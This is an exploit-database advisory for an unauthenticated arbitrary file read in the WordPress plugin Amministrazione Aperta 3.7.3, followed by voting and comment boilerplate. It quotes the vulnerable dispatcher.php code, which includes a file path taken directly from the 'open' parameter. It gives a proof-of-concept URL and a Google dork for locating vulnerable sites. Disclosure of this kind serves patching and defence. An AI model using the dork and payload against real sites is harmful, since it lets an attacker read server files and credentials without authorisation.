WordPress Amministrazione Aperta 3.7.3 Arbitrary File Read

2022.03.24

Credit: Hassan Khan Yusufzai

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-200

Dork: inurl:/wp-content/plugins/amministrazione-aperta/

# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated
# Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/
# Date: 23-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/
# Version: 3.7.3
# Tested on: Firefox

# Vulnerable File: dispatcher.php

# Vulnerable Code:

```
if ( isset($_GET['open']) ) {
    include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
    echo '
        <div id="welcome-panel" class="welcome-panel"
style="padding-bottom: 20px;">
                <div class="welcome-panel-column-container">';

    include_once( ABSPATH . WPINC . '/feed.php' );
```

# Proof of Concept:

localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

WordPress Amministrazione Aperta 3.7.3 Arbitrary File Read

Dork: inurl:/wp-content/plugins/amministrazione-aperta/

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

WordPress Amministrazione Aperta 3.7.3 Arbitrary File Read

Dork: inurl:/wp-content/plugins/amministrazione-aperta/

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.